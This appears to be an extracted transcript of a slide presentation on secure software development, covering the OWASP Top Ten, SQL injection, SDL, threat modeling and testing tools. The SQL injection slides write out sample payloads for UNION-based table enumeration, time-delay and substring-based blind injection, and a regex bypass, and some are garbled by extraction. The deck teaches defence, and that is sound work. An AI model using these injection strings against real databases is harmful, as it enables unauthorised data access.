secure software development presentation
DESCRIPTION
ارائه در مورد ضرورت ایجاد امن نرمافزار و روشهای انجام آنTRANSCRIPT
![Page 2: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/2.jpg)
![Page 3: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/3.jpg)
![Page 4: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/4.jpg)
![Page 5: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/5.jpg)
![Page 6: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/6.jpg)
![Page 7: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/7.jpg)
![Page 8: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/8.jpg)
![Page 9: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/9.jpg)
![Page 10: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/10.jpg)
An example to see why
![Page 11: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/11.jpg)
Top Ten Attacks
• Open Web Application Security Project
• Injection
• Broken Authentication and Session Management
• Cross-Site Scripting (XSS)
• Insecure Direct Object References
• Security Misconfiguration
owasp.org/index.php/Top_10_2013-T10
![Page 12: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/12.jpg)
SQL Injection
http://www-935.ibm.com/services/us/iss/xforce/trendreports/
![Page 13: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/13.jpg)
SQL Injection
![Page 14: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/14.jpg)
• Fill in the blanks!
• SELECT OrderIdFROM SalesWHERE CustomerId = ‘ ’
• SELECT OrderIdFROM SalesWHERE CustomerId = ‘’UNIONSELECT Table_NameFROM INFORMATION_SCHEMA.Table; -- ’
SQL Injection
![Page 15: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/15.jpg)
SELECT OrderIDFROM SalesWHERE CustomerID = ‘ ’
Giving Information to the Attacker
‘‘
![Page 16: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/16.jpg)
Giving Information to the Attacker
![Page 17: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/17.jpg)
Hide the Error
•
• try {resultSet = READ FROM DATABASE;
} catch(error) {redirect(“home.html”);
}if(resultSet.RowCount > 0)
redirect(“history.html”);else
redirect(“home.html”);
Read From DB
Error?
Is Result
> 0
Go to “home”
Go to “history”
Yes
Yes
No
No
![Page 18: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/18.jpg)
CustomerID = ‘
CustomerID = ‘ ;delay 1 min. ;--
Wait 1 min.Go to “home”
Go to “home”
Blind SQL Injection
![Page 19: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/19.jpg)
Is the first letter of the name of the first table an
‘A’ No, it’s notgo to “home”
Is the first letter of the name of the first table an
‘B’ Yes, it isgo to “history”
SELECT OrderID FROM Sales WHERE CustomerID = ‘’ ORMID(
(SELECT table_name FROM INFORMATIN_SCHEMA.tables LIMIT 1), 1, 1) = ‘A’
Blind SQL Injection
![Page 20: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/20.jpg)
Solutions
• Validate Input
• No SQL syntax
• No single quote
• What about Mr. John O’Malley?
• No single quote attack
• URL encoding
• Prevent OR 1 = 1
• Regex
• Encode or escape
![Page 21: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/21.jpg)
Solutions
• Validate Input
• No SQL syntax
• No single quote
• Prevent OR 1 = 1
• Regex
• Encode or escape
![Page 22: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/22.jpg)
Solutions
• Validate Input
• No SQL syntax
• No single quote
• Prevent OR 1 = 1
• Regex
• Encode or escape
Regexlib.comSearch for: person’s nameAllows apostrophesSQL injection: X’ OR A IS NOT NULL
![Page 23: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/23.jpg)
Solutions
• Validate Input
• No SQL syntax
• Escape input
• Insert backslash
• Parameterized queries
• Stored Procedures
![Page 24: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/24.jpg)
Bake Security In
![Page 25: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/25.jpg)
Cost
• “Economic Impacts of Inadequate Infrastructure for Software Testing”
Nist.gov/director/planning/upload/report02-3.pdf
0
5
10
15
20
25
30
35
Req. / Design Coding / Unit Testing Integration Testing Customer BetaTesting
Release
Relative Cost to Fix Software Defects
![Page 26: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/26.jpg)
Time
Find vulnerabilities
Hold release to
fix
Fix
Schedule a pentest
Pentest
![Page 27: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/27.jpg)
HOWto bake security in?
![Page 28: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/28.jpg)
Training
![Page 29: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/29.jpg)
Threat Modeling
• Ultimate pessimist’s game
• Many Approaches
• Asset-centric
• Attacker-centric
• Software-centric
• Mitigation
• E.g. encrypt database
![Page 30: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/30.jpg)
SDL Threat Modeling Tool
• A Data Flow Graph
• STRID
• Spoofing
• Tampering
• Information disclosure
• Denial of service
• Elevation of privilege
Add item into cart
View cart
contents
User database
Product Catalog
Cart Database
User
![Page 31: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/31.jpg)
Secure Coding Libraries
• Don't reinvent the wheel
• Code review
• Correctness or Disuse
• OWASP AntiSamy or Microsoft Anti-XSS
• OpenSSL
![Page 32: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/32.jpg)
Secure Coding Libraries
Bryan Sullivan and Vincent Liu, Web Application Security, McGraw Hill, 2011
![Page 33: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/33.jpg)
Code Review
![Page 34: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/34.jpg)
Static Analysis Tools
• White-Box Testing
• Integrate them
• Build process
• Code repository server
• False positive reports
![Page 35: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/35.jpg)
Automated Analysis Tools
Tool Lang / Framework Free / Commercial
FindBugs™ Java Free (LGPL)
OWASP LAPSE+ Java Free (GPL)
FxCop .NET Free (Ms-PL)
PHP SecurotyScanner
PHP Free (GPL)
JSLint JavaScript Free (LGPL)
HP Fortify Source Code Analyser
C/C++, .NET, Java, PHP, others
Commercial
![Page 36: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/36.jpg)
Security Testing
• Functional test approach
• Black-Box Testing
• Just like a Hacker
• Active
• Passive
![Page 37: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/37.jpg)
Black-Box Testing Tools
IBM Rational AppScan
• Active
• Commercial
OWASP WebScarab
• Reactive
• Free
![Page 38: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/38.jpg)
Back-Box vs. White-Box
GoF# Scala Admin.php
System Boundary
![Page 39: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/39.jpg)
Security Incident Response planning
![Page 40: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/40.jpg)
Industry Standard Secure Development Methodologies
![Page 41: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/41.jpg)
![Page 42: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/42.jpg)
![Page 43: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/43.jpg)
![Page 44: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/44.jpg)
![Page 45: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/45.jpg)
Trustworthy Computing Memo
![Page 46: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/46.jpg)
training• Core
Security Training
Req.• Establish
Security Requirements
• Create Quality Gates/Bug Bars
• Security & Privacy Risk Assessment
Design• Establish
Security Requirements
• Analyze Attack Surface
• Threat Modeling
Impl.• Use
Approved Tools
• Deprecate Unsafe Functions
• Static Analysis
Verif.• Dynamic
Analysis
• Fuzz Testing
• Attack Surface Review
Release• Incident
Response Plan
• Final Security Review
• Release Archive
Resp.• Execute
Incident Response Plan
Security Development Lifecycle (SDL)
Microsoft.com/sdl
![Page 47: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/47.jpg)
SDL-Agile
![Page 48: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/48.jpg)
OWASPComprehensive Lightweight Application Security Process (CLASP)
Project manager
Security Auditor
Test Analyst
Implementer
Architect
Requirements Specifier
Designer
![Page 49: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/49.jpg)
`